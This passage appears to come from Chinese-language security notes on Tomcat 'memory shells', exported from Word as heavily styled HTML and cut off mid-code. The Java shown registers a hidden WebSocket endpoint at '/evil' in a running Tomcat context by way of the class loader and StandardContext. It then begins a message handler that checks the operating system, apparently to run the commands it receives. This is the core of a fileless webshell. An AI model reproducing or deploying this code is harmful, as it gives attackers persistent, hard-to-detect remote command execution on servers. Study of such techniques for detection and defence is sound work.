'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">implements</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> MessageHandler</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">Whole</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">String</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">static</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span>WebappClassLoaderBase webappClassLoaderBase </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">WebappClassLoaderBase</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Thread</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">currentThread</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">().</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getContextClassLoader</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">();</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span>StandardContext standardContext </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">StandardContext</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> webappClassLoaderBase</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getResources</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">().</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getContext</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">();</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span>ServerEndpointConfig build </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> ServerEndpointConfig</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">Builder</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">create</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">evil</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">class</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"/evil"</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">).</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">build</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">();</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span>WsServerContainer attribute </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">WsServerContainer</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> standardContext</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getServletContext</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">().</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getAttribute</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">ServerContainer</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">class</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getName</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">());</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">try</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span>attribute</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">addEndpoint</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">build</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">// System.out.println("ok!");</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">catch</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">DeploymentException e</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">throw</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">RuntimeException</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">e</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">private</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> Session session</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">public</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">void</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">onMessage</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">String</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> message</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">try</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">boolean</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> iswin </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">System</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getProperty</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"os.name"</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">).</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">toLowerCase</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 